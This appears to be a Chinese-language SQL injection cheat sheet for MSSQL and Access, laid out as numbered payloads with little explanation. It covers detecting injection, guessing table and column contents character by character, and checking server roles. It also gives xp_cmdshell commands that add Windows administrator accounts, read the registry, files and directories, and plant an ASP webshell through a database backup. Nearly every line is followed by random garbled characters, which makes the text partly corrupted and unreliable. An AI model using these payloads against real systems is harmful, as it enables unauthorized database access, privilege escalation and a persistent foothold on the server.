1.判断是否有注入;and 1=1 ;and 1=2 ��(<r�)xkn
2.初步判断是否是mssql ;and user>0 _i}b]�xfM�
A��{
~�D_q
3.注入参数是字符'and [查询条件] and ''=' -n&&d8G^�s
0#9H�;j<Op
4.搜索时没过滤参数的'and [查询条件] and '%25'=' wKLY�yetM!
e{@RBYX@+c
5.判断数据库系统 J`U�]�Ux/L
/iFn�=pk1?
;and (select count(*) from sysobjects)>0 mssql AN�Fe�s*8j
IQ�@��9S��
;and (select count(*) from msysobjects)>0 access LDc EjFK(�
�NgD�hdOB
�/�"�8e�,
SK\@w9#&�$
6.猜数据库 ;and (select Count(*) from [数据库名])>0 @����W>@6E
hK3-j�;�eg
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �x<gmDy*�
y�ws'}{8��
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ��Kf:!�tRE
T���s��e#{
9.(1)猜字段的ascii值(access) GIM/�T4!)�
UH�Z&�7jfl
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �5_a�j]�"x
+PjTT�6�
(2)猜字段的ascii值(mssql) QQS*r}>���
YWK0.F,8�a
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 `�/P�BZ�nj
;�[���}OZt
10.测试权限结构(mssql) f%,S::%E�a
\Nt�
5TG�_
�y>y2,x+[�
E:�x@�O8�F
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
K<e�
#y!
BA �c+T���
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- KMj\A
��d
�}#FV{C]�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- v`J�t+�?I�
wHj��1��+W
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �$�&as5z8�
o1Z���VEvp
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- %^@l5h.lqB
tTy��!o�=
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �5v)^4(
)
L;RE5YrH%6
;and 1=(select IS_MEMBER('db_owner'));-- E�fEgY|V�0
-wXeu�e},>
Mp`$1K��sn
{�$z54nvw$
11.添加mssql和系统的帐户 1%+-}y��o<
qS��vV�|G�
;exec master.dbo.sp_addlogin username;-- :�hZ�M��$4
;exec master.dbo.sp_password null,username,password;-- ]o�<]A�[<�
K�z"3ba}KH
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��idYB.]Y(
?:�\/-y)Sp
;exec master.dbo.xp_cmdshell 'net user username password F0�<�)8�{s
]%E��h" ��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ?}K�RAtJ8�
Fa%�1]���R
;exec master.dbo.xp_cmdshell 'net user username password /add';-- l�n�y�b4d/
eM<N?�9�s�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- kkq1:\pZ]a
ab2���F�K�
|Sk�Qe�[t�
F@u7Oel@�m
12.(1)遍历目录 s(=w�G|���
�m.K cTM%j
;create table dirs(paths varchar(100), id int) |�(.\J`_e�
qdix@��@��
;insert dirs exec master.dbo.xp_dirtree 'c:\' Z�A(u"T~��
�.��$&^y�p
;and (select top 1 paths from dirs)>0 qq5�X3K�2&
AM}�2��=Ip
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ?@ oF@AEx=
FgH7YkKr�D
E��V?}oh"x
$�,}jz.R�@
(2)遍历目录 !/�}3��/iU
u_k[<�&�$�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- `Wa�yR^��9
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 VE+H! ob
A
��zS%�XmS\
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 4C�M'I~���
O52�/�fGt�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �: "85w�#r
8%9 C�<+.R
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 M6g8+��sio
36=aahXd�\
u9!�
�� ?�
4'���O,xC
13.mssql中的存储过程 9nG^_.}|��
yD3�}�U�Sw
xp_regenumvalues 注册表根键, 子键 c]^�P�$F8U
d���b�by.%
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 L2XhrL�K.|
�d�/�; tq�
xp_regread 根键,子键,键值名 h1_�Z&VJ��
�*z~,|DQ(A
;exec xp_regread Cab.�a)o��
�\BnU�?��z
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 :c/��54Ss~
u�BlPw�b,V
xp_regwrite 根键,子键, 值名, 值类型, 值 �
�(Q8!5�s
G8a��v�5zR
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 2{=�]�P�f�
]�E/0i�M5
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 =�%�W�:N|k
Pe���_�O(
xp_regdeletevalue 根键,子键,值名 ,�jY�:@<�n
y�T���7$6x
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 'I�$FOH���
���@lN\.�O
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 \W*L9az�r�
t�%�}�<S~"
R;OPY�?EeW
e0`z~�z]6&
14.mssql的backup创建webshell hY&Yp^"}]^
P(�shbi�@�
use model �VV�eJe"!t
uP�fz'�|,
create table cmd(str image); ���ZO<�,�V
`DY�h���Gk
insert into cmd(str) values (''); FOk&z!xYKd
Px��r/*��X
backup database model to disk='c:\l.asp'; �>PA*L(Dh%
,U\����s89
$�?5�6� i4
�n�4{�%�M
15.mssql内置函数 +9T�c.3v�Q
E�V�PQ��e-
;and (select @@version)>0 获得Windows的版本号 �;\pVc)\4"
`58%�&3lp�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa JQ%hh&M\�0
cACIy y�Q�
;and (select user_name())>0 爆当前系统的连接用户 KL_��/f ��
!y�d B�,S
;and (select db_name())>0 得到当前连接的数据库 �d0��>U-.�
���c���e;7
�HP8���J\`
r
XJ�x~
g
16.简洁的webshell �_�KM?�
?&
�nCq'=L,m�
use model 30s�J�"hF9
QD�@O!};
T
create table cmd(str image); ?\�Z pVL<>
w
% Hj'���
insert into cmd(str) values (''); �M@.l#
[@U
Q�5AS�N"�_
backup database model to disk='g:\wwwtest\l.asp';
